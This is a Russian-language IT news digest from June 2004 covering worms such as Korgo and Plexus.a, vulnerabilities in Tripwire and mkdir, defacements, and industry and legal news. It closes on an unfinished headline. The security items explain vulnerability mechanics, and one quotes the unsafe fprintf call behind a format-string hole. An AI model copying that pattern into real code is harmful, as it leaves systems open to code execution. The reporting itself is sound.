Многие программисты считают «заимствование кода» — использование в работе уже существующего ПО — приемлемой практикой, несмотря на то, что это создает минное поле для работодателей. Это явление изучается в отчете, который должен быть опубликован в конце недели. Анонимный онлайновый опрос более чем 3000 программистов установил, что почти 70% респондентов собирает личную библиотеку кода, которым они свободно обмениваются с другими программистами в компании. Такой код обычно используется без ведома или разрешения его юридического владельца, утверждают специалисты по ИТ-праву из журнала out-law.com. «Заимствование или копирование кода, хотя это в некоторых случаях и незаконно, является, на мой взгляд, общераспространенной практикой в среде разработчиков ПО, — сказал независимый программист, один из участников опроса. — Большинство разработчиков, с которыми я общался (и я сам), используют, копируют и даже взламывают (reverse-engineer) код, чтобы улучшить его или включить в свою собственную программу». Исследование показало также, что разработчики не понимают: для возбуждения иска о нарушении авторских прав программное обеспечение не обязательно должно быть идентичным. Почти 90% сказали, что воспроизвели бы функции другой программы, не копируя самого кода. «Между тем, просто справляясь по оригинальному коду и изучая программу, разработчик тем самым все равно может скопировать ее существенную часть», — поясняет Макирнан. Это угроза и для софтверных компаний, так как программисты часто меняют работу. Тем самым повышается вероятность того, что штатные сотрудники и разработчики по контракту станут использовать материалы, принадлежащие их прежнему работодателю, клиентам или кому-то еще. «Интернет повышает риск еще больше, делая доступным ПО отовсюду на свете и позволяя обмениваться кодом на форумах и через доски объявлений», — говорит Макирнан.
ZDNet.ru

6/06/2004 11:08 В Молдавии появился законопроект об ЭЦП
Президент Молдавии Владимир Воронин направил в парламент страны законопроект «Об электронном документе и цифровой подписи» в рамках законодательной инициативы, сообщили в пресс-службе президента, сообщает пресс-центр ФЦП «Электронная Россия». По мнению главы государства, юридическое признание электронной подписи позволит «исключить бюрократические барьеры, снизить уровень коррупции, и, в конечном счете, увеличить доходы в государственный бюджет». "Принятие закона — обязательное условие для построения системы «электронного правительства», — подчеркнул В. Воронин. Первый проект закона «О цифровой подписи» был одобрен правительством Молдавии в январе 2002 года. При его рассмотрении на уровне юридического управления и комиссий парламента выявлены недостатки, и документ был направлен на доработку, которая продолжалась около года, после чего департамент информационных технологий вышел с предложением распространить закон и на электронные документы. В Молдавии цифровую подпись используют шесть банков и 2 тыс. юридических лиц.
Источник

6/06/2004 10:44 У вирусописателей очередной пик активности
В мае 2004 года антивирусная лаборатория Sophos зафиксировала 959 новых интернет-вирусов. Это самый высокий показатель за последние два с половиной года. Как сообщает TechWeb, в «лучшую десятку» мая 2004 года, составленную сотрудниками Sophos, вошли такие нашумевшие во всех смыслах вирусы, как Sasser, Netsky-Z, Sober-G, Bagle-AA и Lovgate-V. Пальму первенства по общему количеству зараженных машин забрал себе, разумеется, Sasser – один из самых активных вирусов последних лет.
Internet.Ru

6/06/2004 10:01 Новый Windows-червь ворует номера кредиток
Новый вирус-червь ворует с зараженного компьютера под управлением ОС Windows всю банковскую и личную информацию владельца машины, сообщается на сайте австралийской газеты Sydney Morning Herald. Вирус, получивший название Korgo, использует для заражения компьютера "дыру" в системе, а заразив машину, начинает отслеживать нажатия клавиш, и отсылает всю полученную информацию о банковских интернет-транзакциях своим создателям. По словам представителей антивирусной компании F-Secure, уже существует несколько разновидностей червя. Все они используют уязвимость в системе Windows, для которой еще в апреле Microsoft выпустила исправление. Представитель F-Secure Микко Хиппонен (Mikko Hypponen) сообщил, что "червь активно распространяется, и не менее активно похищает пользовательские пароли, предназначенные для работы с интернет-системами банков. Кроме того, вирус собирает и отправляет своим создателям все данные, которые пользователь вводит в интернет-формах, в том числе - номера кредитных карт и пароли к платным сайтам. Хиппонен рекомендует всем, чьи компьютеры были заражены вирусом Korgo, заблокировать кредитные карты, особенно те, которые использовались последнюю неделю в Интернете, и поменять пароли. "Это не шутка", - добавил он.
Подробности

5/06/2004 17:10 Выход IRIX 6.5.24
Известная корпорация Silicon Graphics (SGI) анонсирровала выпуск новой версии своей операционной системы - IRIX 6.5.24. В новой версии добавлена поддержка графической системы GRIO version 2, увеличена скорость работы на операциях ввода/вывода, включена поддержка кластерной файловой системы CXFS и др. Выпуск новой версии 6.4.25 ожидается в середине августа.
Анонс от SGI

5/06/2004 13:46 Широкополосные VPN-маршрутизаторы Barricade
Московское представительство компании SMC Networks сообщило о выпуске широкополосных маршрутизаторов серии Barricade. Это 8-портовое устройство SMCBR18VPN и 4-портовые SMCBR14VPN и SMCBR14VPN-G. Последняя из перечисленных моделей имеет встроенную точку доступа к беспроводным сетям стандарта 802.11g. Две другие модели снабжены коммутаторасм для подключения компьютеров или сетевого оборудования. Новые маршрутизаторы, предназначенные для предприятий малого и среднего бизнеса, а также домашних пользователей, способны формировать защищенные VPN-туннели, которые могут применяться, в частности, для связи через Internet подразделений предприятий, а также для проведения онлайновых игр. Поддерживаются протоколы IPSec, PPTP и L2TP. Встроенные межсетевые экраны предотвращают атаки типа DoS, IP Spoofing и ряд других. Предусмотрена передача сообщений об атаках по электронной почте. Обеспечены работа с протоколами статической маршрутизации и SNMP-управление.
"Открытые системы"

5/06/2004 13:27 «Диджитал Нетворк» (торговая марка msm.ru, Москва): звонки — бесплатно
ЗАО «Диджитал Нетворк» (торговая марка msm.ru, Москва) представляет свой новый проект — сеть IpPort. По сообщению компании, IpPort позволяет бесплатно разговаривать с пользователем, находясь в любой точке мира, со своего компьютера, используя программы OpenPhone или «IP телефонный адаптер». Для начала работы с IpPort нужно зарегистрироваться. После регистрации пользователь получает телефонный номер сети IpPort и может звонить сам или отвечать на звонки друзей и знакомых.
О проекте IpPort

5/06/2004 11:30 Операторы мобильной связи зарабатывают на обмане своих клиентов
Журнал для потребителей «СПРОС» в апреле-мае 2004 года провел исследование мультимедийных услуг операторов сотовой связи. В частности, под пристальным вниманием оказались такие услуги, как отправка MMS-сообщений, WAP, выход в Интернет через GPRS-соединение, предоставляемые операторами «большой тройки» («Би Лайн», «МТС» и «МегаФон»). Результат оказался далеко не блестящим. Часто данные услуги операторов не работают из-за неисправностей и неполадок в работе их оборудования. Но компании не утруждают себя извещением об этом своих абонентов ни через СМИ, ни через свои официальные сайты. При этом абонент продолжает оплачивать неработающие услуги. Журнал «СПРОС» приводит пример: с 6 по 21 апреля 2004 года не работала услуга GPRS в «Мегафоне». При этом нигде не было информации о том, что в работе данной услуги у оператора имеются проблемы. Другой пример: с 25 по 28 мая 2004 года в «МТС», со слов служащих компании, была модернизация оборудования MMS-центра. В связи с этим некоторые ММS-сообщения до адресата не доходили, но это не мешало оператору взимать средства с клиента за отсылаемые ММS-сообщения. А цена на услугу довольно дорога: 30 центов. При тестировании услуги «Интернет через GPRS» были получены такие результаты по скорости передачи и приёма данных: «Би Лайн» — скорость передачи в среднем 3,12 Кбит/сек, скорость приёма 14,96 Кбит/сек; «МТС» — 8 Кбит/сек / 16,8 Кбит/сек; «Мегафон» — 7,6 Кбит/сек / 33,6 Кбит/сек. Такие цифры явно не соответствуют заявленным показателям. В Интернете, рекламе, СМИ фигурирует значение скорости передачи данных значительно большее — как минимум 30 Кбит/сек и более. Налицо введение потребителя в заблуждение, ведь заявленные скорости в 2-3 раза выше реальных.
Helpix

5/06/2004 11:17 Патч для включения аппаратной защиты от переполнения буфера в Linux.
Как сообщает opennet.ru, Ingo Molnar анонсировал патч позволяющий запретить выполнение кода в областях памяти не помеченных как исполняемый код (PROT_EXEC), через использование технологии EVP (Enhanced Virus Protection), реализованной в процессорах семейства AMD64 и затем появившейся в CPU от Intel.
О патче
Руководство по использованию

5/06/2004 10:49 Началось испытание могильщика паролей Windows
В среду Microsoft и RSA Security приступили к бета-тестированию продукта, призванного положить конец использованию традиционных паролей и заменить их паролями, автоматически генерируемыми жетоном SecurID. SecurID — это одна из наиболее популярных двухкомпонентных систем аутентификации, которая уже применяется во многих крупных организациях. Жетон размером примерно со спичечный коробок генерирует новый шестизначный код каждую минуту. Пользователи получают легко запоминающийся номер PIN, который нужно вводить вместе с отображаемым на жетоне кодом. Когда система SecurID будет интегрирована с Windows, предприятиям станет легче и дешевле предотвращать применение пользователями слабых паролей и сделать так, чтобы они их не забывали. Программа бета-тестирования охватывает небольшое число компаний и продлится примерно месяц. Вскоре после ее окончания RSA Security планирует выпустить полноценную коммерческую версию системы. Об интеграции SecurID и Windows было впервые объявлено в начале этого года на конференции RSA Security в Сан-Франциско. Тогда Билл Гейтс заявил, что эта разработка похоронит традиционные пароли.
ZDNet

5/06/2004 10:16 Информация о новой версии Longhorn
Операционная система Longhorn, которая должна прийти на смену Windows XP, является одной из ведущих тем для всех изданий, следящих за развитием информационных технологий. Окончательного выхода этой операционной системы стоит ожидать не ранее 2006 года. Более того, в последнее время руководители Microsoft неохотно говорят о конкретных сроках выпуска системы, то есть, вполне вероятно, она может задержаться до 2007 года. Первая бета-версия Longhorn появится в 2005 году, а пока система существует в виде ранних альфа-версий. Часть этих версий являются закрытыми, а некоторые распространяются для ознакомления среди разработчиков оборудования и программ. Первая такая версия была выпущена прошлой осенью. Ее смогли получить участники конференции Microsoft для профессиональных разработчиков (PDC). Более современная альфа-версия досталась участникам конференции WinHEC 2004 в мае нынешнего года. Данная версия - Longhorn Build 4074 - попала в руки обозревателей издания PC World. Как выяснилось, по сравнению с доступной в январе версией, внешних изменений в Build 4074 немного. Практически все нововведения, такие как элементы новой системы индексирования, интерфейса, защиты информации, остались на своих местах. Из нововведений отмечается новая форма поиска информации, которая позволяет искать информацию на диске, в файлах, архивах электронной почты и в интернете (с помощью соответствующего сервиса MSN). Впрочем, поисковые технологии Microsoft пока далеки от окончательного варианта, и указанная форма, скорее всего, является временным решением. В материале PC World обращается внимание и на то, что в Longhorn Build 4074 имеются много элементов, которые попросту не работают. В частности, в систему не удалось установить драйверы для видеокарты, звуковой подсистемы и сетевого адаптера, которые прекрасно работали в более ранних билдах системы.
"Компьюлента"

5/06/2004 09:42 Пиратские Windows XP не получат долгожданный Service Pack 2
Пользователи пиратских копий Windows XP не смогут установить ключевые обновления системы, сообщает BBC News. Руководство Microsoft приняло решение, что готовящийся к выпуску SP2 не будет работать с самыми популярными пиратскими версиями операционной системы. Этим летом Microsoft выпустит Service Pack 2 для Windows XP. Обновление системы закроет некоторые серьезные дыры в системе защиты и позволит более легко и надежно защищать компьютер от вирусов и атак. Британский представитель Microsoft Пол Рэндл заявил, что во время установки Service Pack 2 будет проверяться идентификационный номер копии Windows XP, работающей на компьютере, и обновление не будет устанавливаться, если копия системы пиратская. Пока неясно, как будет проходить обновление системы в странах, где подавляющее большинство установленных систем пиратские, отмечает BBC News. Так, по данным британского Business Software Alliance, 92 процента всего программного обеспечения в Китае пиратское.
BBC

4/06/2004 15:36 Уязвимость в Tripwire
Обнаружена уязвимость в популярном в мире открытых систем пакете проверки целостности системы и предотвращения вторжения Tripwire. Как сообщает автор уязвимости, при задании режима информирования системного администратора о результатах проверки (tripwire -m c -M) каждая формируемая строка отчёта передаётся функции fprintf() в виде: fprintf(mpFile, s.c_str() ). При этом, если локальный пользователь может создать специальным образом оформленный файл он может быть передан функции fprinf () c последующим выполнением произвольного кода от имени пользователя, от имени которого запускается tripwire (в 99,9% - root). В качестве меры противодействия предлагается отключить функцию передачи отчёта по E-mail и патч к программе pipedmailmessage.cpp, в которой и обнаружена уязвимость.
SecurityFocus

4/06/2004 14:04 Уязвимость в утилите mkdir
Tim Newsham cообщает о наличии уязвимости в утилите mkdir, поставляемой со всеми дистрибутивами UNIX - ориентированных систем. Утилита предназначена для создания директории в файловой системе. В общем-то автор говорит об уязвимости в UNIX версии 7 (о SYSTEM V ничего не говорится) и утверждает о наличие уязвимости в такой экзотической системе, как PDP-11. Суть уязвимости сводится к тому, что при вызове системной функции mkdir() значение параметра абсолютного пути директории заносится в буфер pname. При этом проверка длины буфера не производится, а его длина ограничена 128 байтами. Кроме того утилита mkdir имеет установленный бит SUID. Таким образом при передаче утилите в качестве параметра абсолютного пути длиной более 128 байт может возникнуть ситуация переполнения буфера с дальнейшим выполнением произвольного кода. Прочитав это сообщение ради интересу проверил полномочия mkdir в Linux Red Hat 7.3 (ls -la /bin/mkdir) - с полномочиями всё в порядке - бита SUID нет.
Описание

4/06/2004 13:36 Очередные проблемы с беспроводными сетями
Швейцарские исследователи обнаружили очередную порцию уязвимостей беспроводных сетей, позволяющих атакующему захватить более широкий канал за счет других пользователей, сообщает bugtraq.ru. Проблема заключается в том, что последние модели адаптеров беспроводных сетей дают возможность модифицировать ряд параметров MAC-протокола, позволяющих перераспределять в свою пользу канал, по которому подключено несколько станций, изменять временнЫе характеристики протокола, некорректно использовать механизмы разрешения коллизий и выборочно перепутывать пакеты других пользователей.
TheRegister

4/06/2004 13:05 Взлом сайта проекта Ruby
На сайте разработчиков языка программирования Ruby (имеющего своих поклонников в мире открытых систем) сообщается о взломе сервера helium.ruby-lang.org. Взлом был обнаружен 28 мая. Как ообщается, была использована уязвимость в системе распределённого контроля версий CVS (мы сообщали о ней на прошлой неделе). Сервис CVS был запущен в chroot-среде, поэтому основная часть сервисов не пострадала. Судя по контрольным суммам MD5, не пострадали дистрибутивы ruby-1.8.1.tar.gz, ruby-1.6.8.tar.gz. Как сообщается сервис почтовых рассылок восстановлен, однако сервисы CVS/WWW/FTP/RSYNC на настоящий момент не работают.
Анонс

4/06/2004 12:04 Интернет-угрозы: мифы и реальность
Эволюция интернет-технологий и распространение устройств, поддерживающих доступ в сеть, а также недостаточно эффективное устранение ошибок в различных веб-приложениях привели к тому, что сегодня глобальная сеть таит в себе невиданную доселе угрозу. Хакеры становятся все умнее и опытнее. Среднее время между выявлением уязвимого места в программных продуктах и появлением кода взлома сократилось с 500 дней в 2000 году до 40 дней в настоящее время. Поставщики борются с проблемой огромного количества дефектов в своем аппаратном и программном обеспечении. В связи с этим Ковьелло утверждает, что в зоне особого риска оказались малые и средние компании, поскольку они далеко не всегда могут себе позволить содержать специальную команду специалистов в области корпоративной безопасности. Несмотря на то, что, по мнению некоторых экспертов, угроза кибертерроризма преувеличена, террористов все больше интересуют атаки на критически важные элементы национальных инфрастуктур, а спам представляет собой гораздо большую опасность, особенно для производительности глобальной сети. Если вернуться к истории Интернет, то необходимо вспомнить, что первоначально Глобальная Сеть задумывалась как коммуникационная альтернатива на случай экстренных ситуаций. Агентству оборонных исследований DARPA было поручено разработать систему передачи сигналов, которая бы продолжала функционировать в случае ядерной войны или стихийных бедствий. Сегодня Интернет стал беззащитным перед сетевыми преступниками и мошенниками. Интернет-преступность все чаще приобретает транснациональный и трансграничный характер. С использованием глобальной информационной сети Интернет такие виды преступлений не имеют государственных границ и могут легко совершаться с компьютерной системы одного государства в отношении субъектов другого государства.
crime-research.ru

4/06/2004 11:12 Microsoft выпустила бета-версию медиаплеера
В среду Microsoft выпустила первую тестовую версию своего нового ПО Windows Media Player, разработанную с особым прицелом на расцветающий рынок портативных устройств. В обновленном Media Player 10, окончательная версия которого выйдет в конце лета, существенно изменен способ организации и поиска музыки, видео и других медиазаписей. Однако самые важные новшества «технической бета-версии» для большинства пользователей останутся невидимыми до тех пор, пока на полках магазинов не появятся новые портативные музыкальные и видеоплееры (это должно произойти летом-осенью). Программа, включающая в себя последние достижения Microsoft в области управления цифровыми правами, а также новую технологию связи компьютера с такими устройствами, как МР3-плееры, — ответ компании на неимоверный успех Apple Computer с ее музыкальным плеером и ПО iPod. Одним из главных достоинств iPod стала чрезвычайная простота использования этого устройства: чтобы загрузить в него музыку, достаточно самых элементарных технических приемов. Новый Windows Media Player перенимает эту идею, добавив возможность автоматически обновлять содержимое памяти портативных устройств, синхронизируя его с коллекциями музыки, видеозаписей и фотографий на ПК. Некоторые из этих функций автоматической синхронизации будут доступны не на всех устройствах — главным образом на тех, которые Windows воспринимает как внешний накопитель. Это могут быть и USB-устройства на базе флэш-памяти, и более крупные МР3-плееры с жестким диском.
ZDNET

4/06/2004 09:40 Двое японцев украли персональные сведения о миллионах пользователей Yahoo!
Японская полиция арестовала двоих мужчин по обвинению в вымогательстве двух млрд йен у руководства банка Softbank. 24-летний Ютака Томиясу и 35-летний Такуйя Мори были арестованы в последние выходные мая в рамках расследования о хищении персональных данных нескольких миллионов интернет-пользователей. Инцидент, в причастности к которому подозревают задержанных, произошел в начале этого года. Жертвами похитителей персональных данных стали почти 4,6 млн пользователей онлайнового проекта Yahoo! BB, созданного усилиями Yahoo! и Softbank. При этом ни номера кредитных карт, ни пароли пользователей огласке не предавались. По версии следствия, Томиясу незаконно вторгся в базу данных Softbank, получив пароль от одного из его сотрудников. Преступник скопировал содержимое базы данных и позже потребовал от руководства банка выплатить ему 2 млрд йен. В мае трое жителей Японии обратились в суд с требованием компенсировать им потери, понесенные в результате недостатков системы банковской безопасности. Сумма каждого иска составляла 100 тыс. йен. В Softbank заявили о готовности выплатить по 500 йен каждому из пользователей, чьи данные оказались в руках хакера.
Источник

4/06/2004 09:02 Microsoft получила патент на изобретение двойного щелчка мышью
Патентное бюро США выдало компании Microsoft свидетельство на изобретение двойного щелчка компьютерной мышью или клавишей на портативных устройствах. Авторами изобретения указаны Чарльтон Луи (Charlton Lui) и Джеффри Блюм (Jeffrey Blum). Патент номер 6727830 закрепляет права компании Билла Гейтса на "метод расширения функциональности клавиш". Как говорится в свидетельстве, изобретение Microsoft позволяет вызвать дополнительные функции за счет неоднократного нажатия клавиши в течение короткого промежутка времени или однократного нажатия в течение длительного времени. В качестве сферы применения изобретения патент называет все компьютерные устройства. Особо в свидетельстве упоминаются портативные компьютеры-наладонники с небольшим набором клавиш, что ограничивает и усложняет работу с приложениями. Каким образом Microsoft намерена использовать права на изобретение двойного нажания клавишей, пока неясно. В конце прошлого года компания потребовала отчислений от пользователей файловой системы FAT, патент на которую Microsoft получила в 1996 году. В ответ на это требование компанию Гейтса вновь обвинили в злоупотреблении своим монопольным положением на рынке, сообщается на сайте MacWorld.com.
Подробности

3/06/2004 14:56 Plexus.a: отголоски эпидемии Mydoom
"Лаборатория Касперского" сообщает об обнаружении нового опасного интернет-червя Plexus.a. Вредоносная программа распространяется по локальным сетям и через интернет в виде вложений в зараженные электронные письма, файлообменные сети, а также через уязвимости в службах LSASS и RPC DCOM Microsoft Windows. Анализ вируса однозначно показывает, что при его создании использовались исходные коды печально известного червя Mydoom. Помимо стандартных для данного типа вредоносных программ функций, деструктивный эффект воздействия Plexus заключается в нарушении механизма загрузки обновлений Антивируса Касперского. На настоящий момент получено большое число сообщений о случаях заражения Plexus.a. Червь использует множество известных принципов размножения. Маскируясь под дистрибутивы популярных пользовательских приложений, Plexus.a попадает на компьютеры через локальные и файлообменные сети. Значительное число заражений происходит из-за печально известных уязвимостей в службах Microsoft Windows: LSASS, которой пользовался сетевой червь Sasser; и DCOM RPC - её использовал один из лидеров прошлогоднего вирусного рейтинга Lovesan. Таким образом, Plexus.a поражает компьютеры, на которых не установлены патчи, устраняющие данные уязвимости. Характерной особенностью механизма самораспространения нового вируса является разнообразие вариантов рассылаемых зараженных электронных писем. Для дезориентации пользователей Plexus.a применяет пять различных вариантов писем. Они отличаются по формальным признакам: заголовку, текстовому содержанию и названию приложенного к сообщению файла. Неизменным остается его размер: упакованный в формате FSG файл занимает 16208 байт, распакованный - 57856. После запуска червь копирует себя в системный каталог Windows под именем "upu.exe", и регистрирует данный файл в ключе автозапуска системного реестра для самоактивации при каждой перезагрузке компьютера. Для определения своего присутствия в системе червь также создает в памяти уникальный идентификатор "Expletus". Затем он сканирует файлы на дисках пораженного компьютера и рассылает себя по всем найденным в них адресам электронной почты. Помимо сложной процедуры самораспространения, Plexus.a располагает двумя деструктивными функциями, представляющими значительную угрозу инфицированному компьютеру. Прежде всего, червь пытается нарушить работу автоматического обновления антивирусных баз Антивируса Касперского. Это производится путем подмены содержимого файла "hosts" в системной директории Windows. Не меньшую опасность для зараженного компьютера представляет троянская составляющая Plexus.a. C ее помощью вирус открывает на прослушивание TCP порт 1250, предоставляя возможность проводить загрузку файлов на машину-жертву с их последующим запуском. Это дает злоумышленникам доступ к удаленному управлению компьютером, в частности, позволяет запускать на выполнение различные команды и загружать файлы по усмотрению автора червя.
Подробное описание

3/06/2004 13:36 До конца года в Москве должна быть введена повременная оплата за телефон
До конца года в Москве должна измениться схема оплаты телефонных переговоров. В соответствии с федеральным законом "О связи" жителям столицы будет предложен выбор: либо вносить абонентскую плату, которая, скорее всего, вырастет, либо платить за время разговора. Стоимость минуты будет установлена Федеральной службой по тарифам: по предварительным данным, она не превысит 25 копеек. Как сообщил на страницах сайта GZT.ru, коммерческий директор Московской городской телефонной сети (МГТС) Александр Коновалов, статья 54 нового федерального закона "О связи", вступившего в силу 1 января 2004 года, требует от операторов перехода на "повременку", причем абоненты смогут сами выбирать форму оплаты. Как должно быть понятно, введение повремёнки наверняка больно ударит по пользователям диал-апа. И наверняка может не менее больно ударить по провайдерам (не у всех из них есть call-back). Вполне возможно, что на волне введения повремёнки может повыситься рейтинг подключения по выделенной линии, в том числе по новому тарифному плану МТУ-Интел "Стрим" (технология ADSL).
Источник

3/06/2004 13:20 Аэропорты Британии встали
Небо над Великобританией практически парализовано - сбой компьютерной системы и отключение диспетчерского центра привели к задержке почти всех рейсов в британских аэропортах. Национальная диспетчерская служба страны объяснила решение оставить самолеты на земле предоставлением возможности наземным службам сконцентрироваться на тех воздушных судах, которые уже находятся в воздухе. Спустя некоторое время диспетчерский центр возобновил работу, но большинство самолетов пока находится на земле. Большинство аэропортов продолжает регистрацию пассажиров в нормальном режиме, но предупреждает о возможных задержках рейсов. Пока неизвестно, что именно вызвало сбой компьютерной системы. Ясно лишь, что программа, отвечающая за непересечение траекторий самолетов в воздухе, работала все это время нормально. Национальная диспетчерская служба утверждает, что сбой не привел к нарушениям систем безопасности.
BBC

3/06/2004 12:56 "Караван" (Москва) ввел "анлимитед" за $40/мес
Вчера, 1 июня 2004 г., "Караван" ввел новый тарифный план коммутируемого доступа "Неограниченный" без ограничения времени. Абонентская плата для пользователей данного тарифа составит $40/мес. Выход в интернет осуществляется через цифровой модемный пул 247-5986. Тарифный план предназначен для активных пользователей, которые проводят в сети большое количество времени. Тариф "Неограниченный" включает в себя весь набор услуг коммутируемого доступа в компании "Караван": бесплатный почтовый ящик, работа через pop и smtp сервера, а также через веб-интерфейс; статистика работы в сети; АОН и система защиты от кражи паролей; круглосуточная поддержка. Необходимо отметить, что за последнее время "Караван" - уже вторая компания из числа заслуживающих доверия операторов, которая вводит подобный тарифный план за $40/мес (ранее "анлим" по такой же цене ввел "Гарант-Парк-Телеком"). До недавнего времени такие цены на неограниченных тарифах коммутируемого доступа были возможны лишь в двух случаях, - если компания сама является телефонным оператором, и пользуется телефонными мощностями по себестоимости, и если стремление привлечь пользователей низкой ценой осуществляется в ущерб качеству дозвонки (пожалуй, у всех московских ветеранов Интернета в памяти неограниченный доступ от "ПТТ-Телепорт", которым было невозможно воспользоваться из-за тотальной занятости модемных пулов)..
Источник

3/06/2004 12:27 Sun подтверждает планы по открытию исходного кода ОСSolaris
На азиатско-тихоокеанской конференции в Шанхае CEO компании Sun Джанатан Шварц подтвердил, что слухи об открытии исходного кода Solaris полностью соответствуют реальности. "Я не могу назвать точной даты" - сказал Шварц, - "Но ошибки нет.Мы откроем исходный код Solaris".
CNETAsia

3/06/2004 12:04 Штраф за пиратство увеличится в 10 раз
2 июня в Государственной Думе в первом чтении были приняты поправки в Кодекс об административных правонарушениях. Поправки касаются санкций за интеллектуальное пиратство и увеличивают штраф за этот вид правонарушений. Принять этот законопроект рекомендовал Владимир Плигин от комитета по конституционному законодательству и государственному строительству. Альтернативный законопроект был внесен Законодательным собранием Челябинской области и предусматривал усиление административной ответственности за распространение контрафактной аудиовизуальной продукции. Отметим, что увеличение штрафа касается только должностных лиц и индивидуальных предпринимателей. На данный момент штраф для граждан составляет от пятнадцати до двадцати минимальных размеров оплаты труда с конфискацией контрафактных экземпляров произведений, для должностных лиц - от тридцати до сорока МРОТ, а для юридических - от трехсот до четырехсот МРОТ. Предполагается, что размеры штрафов будут увеличены в 10 раз, но эта цифра еще будет уточняться ко второму чтению.
"Компьюлента"

3/06/2004 11:39 СЕО Symantec назвал уязвимость ПО Microsoft мифом
Джон Томпсон развенчал «миф» о том, что операционная система Microsoft внутренне менее безопасна, чем альтернативы open source, которые он сравнил с тупиком. Правда, добрых слов в адрес софтверного гиганта тоже прозвучало не много. СЕО Symantec уверен, что причина того, что Microsoft часто считают виновником вспышек вирусных инфекций и пробелов в защите, тривиальна: просто это самая большая мишень — хотя он и признает, что когда «ландшафт становится слишком однородным, это нехорошо», особенно когда речь идет о безопасности. И хотя некоторые считают, что вторжение Microsoft в сферу бизнеса антивирусного ПО путем приобретений поможет ей лучше залечивать собственные раны, Томпсон убежден, что в антивирусном секторе Microsoft пока нельзя воспринимать всерьез. «Средства защиты предпочитают покупать у тех, кого хорошо знают. Мы производим такие средства много лет. Мы не занимаемся игровыми приставками или операционными системами. Безопасность — это наш хлеб». Томпсон сравнил писателей вирусов с художниками граффити — «холстом» для которых служат операционные системы. Во время своего выступления Томпсон сказал: «То, что Linux надежнее — отраслевой миф. Я в это не верю». Но Томпсон не видит ничего, что могло бы заменить Microsoft в обозримом будущем — он отмел предположения, что следующей мишенью для вирмейкеров станут мобильные и беспроводные сети. «Среда Windows еще очень долго будет оставаться главной мишенью», — сказал он, и в качестве следующей вероятной цели для вирмейкеров, хорошо освоивших код Microsoft, назвал продукты Microsoft Office. Однако Томпсон считает, что есть вещь поважнее, чем забота о безопасности операционных систем или борьба с вирусописцами — необходимость просвещать пользователей.
Подробности

3/06/2004 11:08 Дефейс сайта capitalist.org
Как сообщил нам член российской команды LwB Security Team под ником durito, ими был подвергнут дефейсу сайт capitalist.org. Так как на момент публикации на титульной странице сайта продолжает висеть "привет" от команды LwB - пришлось обратиться к кэшированной Google странице. Как следует из неё, страница принадлежала Steven Gagnon, который то ли пропагандировал, то ли исследовал символику флага США и валюту этой страны, ну и попутно пропагандировал капитализм, как лучший экономический строй человечества.
Источник

3/06/2004 10:21 Совет Федерации разрабатывает закон об Интернете
Совет Федерации занят разработкой законопроекта, регламентирующего деятельность в Интернете. Как сообщил РИА "Новости" председатель информационной комиссии верхней палаты, вице-спикер Совета Федерации Дмитрий Мезенцев, новый законопроект разрабатывается совместно с Мининформсвязи и крупнейшими компаниями, работающими в Сети. Мезенцев также отметил, что консультации по проекту начались еще несколько месяцев назад. "Они начались задолго до мартовского заседания нашей комиссии, на которой мы с представителями министерства обсуждали проблемы развития Интернета", - отметил сенатор. В настоящее время, по словам Мезенцева, члены Совета Федерации хотят понять, "какие должны быть подходы к механизму регулирования Интернета с тем, чтобы ни в коей мере никто из добросовестных пользователей сети не только не страдал, но ему не мешали работать". В мае мэр Москвы Юрий Лужков выступил против анонимности создателей интернет-сайтов, которая, по мнению мэра, позволяет заниматься "черным пиаром", размещать материалы порнографического характера и нарушать авторские права писателей и музыкантов. В статье также говорилось о том, что новое законодательство должно защитить провайдеров "путем введения строгих наказаний за попытки взлома сайтов, за насильственную, с помощью технических ухищрений, фальсификацию их содержания, за создание сайтов-двойников и т.д."
РИА "Новости"

2/06/2004 20:11 Обход некоторых ограничений безопасности в Microsoft Windows 2000 домене
Обнаружена уязвимость в ОС Windows 2000. Пользователь может обойти некоторые ограничения безопасности. В некоторых случаях пользователь может войти в Windows 2000 домен, даже если у него закончилось время жизни учетной записи. Уязвимость возникает только в системах, в которых FQDN (Fully Qualified Domain Name) равно 8 символам. Уязвимость будет устранена в следующем пакете обновлений для Windows 2000.
Подробности

2/06/2004 18:07 Пойман российский хакер, укравший 11 тыс. рублей
Отдел по борьбе с преступлениями в сфере высоких технологий Ливенского ГРОВД возбудил уголовное дело против кассира одного из местных супермаркетов торговой сети "Магнит", принадлежащей сети супермаркетов "Тандем". Около года назад молодой человек 23-х лет сумел взломать сетевые пароли внутренней локальной сети и несколько месяцев в конце своих рабочих смен удалял часть собственных кассовых отчетов, списывая за один раз по 500-1000 рублей. Однако в конце мая 2004 года бухгалтерская проверка выявила недостачу. После внутреннего расследования, к которому были привлечены системные администраторы "Тандема" из Орла и Москвы, местный хакер был пойман. Во вторник 1 июня все материалы проверки переданы в Ливенский ГРОВД, возбуждено уголовное дело. Компьютерному взломщику грозит штраф до 300 размеров минимальной оплаты труда или 2 года лишения свободы, сообщает корреспондент CNews.ru.
Cnews

2/06/2004 17:44 Вэб-сайты ЮАР пострадали от массированной хакерской атаки
Как сообщил Reinhardt Buys из фирмы Buys в понедельник - в результате мощнейшей хакерской атаки были задефейсены 73 Вэб-сайта, входящих в доменнную зону ЮАР (.za). Даже сайт довольно известного андэграунд и секьюрити сообщества Hack.co.za упал в результате нескольких мощных атак. В 12.21 дня в воскресенье сайт был взломан и заглавная страница была изменена, ичходя из чего делается заключение, что атака была проведена группой "FBH". Сайт находился под управлением ОС Linux и Вэб-сервера Apache. Согласно Zone-H, аббревиатура FBH обозначает "Federal Bureau of Hackers" и состоит из граждан Пакистана (чем им ЮАР не угодила?). Перед этим, в 7.52 утра субботы группа под названием "DIabOlaX" взломала 72 сайта, которые находились под управлением ОС Win2K. Титульные страницы Вэб-сайтов были убраны и вместо них стояли ссылки на группу и на её почтовый адрес - cr4ck3r@linuxmail.org.
Подробности

2/06/2004 17:22 WLAN - под контроль
В Computer Associates International готовится к выпуску инструментарий управления беспроводными локальными сетями Wireless Site Management. В настоящее время программный продукт проходит бета-тестирование. В системе предусмотрены функции автоматической генерации и дистрибуции ключей шифрования, а также их ротации с заданной частотой. WSM позволяет администраторам устанавливать периметры доступа и "вычислять" несанкционированные устройства, подключаемые к сети. Как средство мониторинга, WSM измеряет и контролирует производительность сети, генерируя отчеты и выполняя балансировку нагрузки. Имеется возможность назначения приоритетов различным типам трафика. Предусмотрены функции, позволяющие обеспечивать соответствие производительности сети соглашениям об уровне обслуживания.
Источник

2/06/2004 17:09 Воссоздан компьютер, взламывавший немецкие шифры
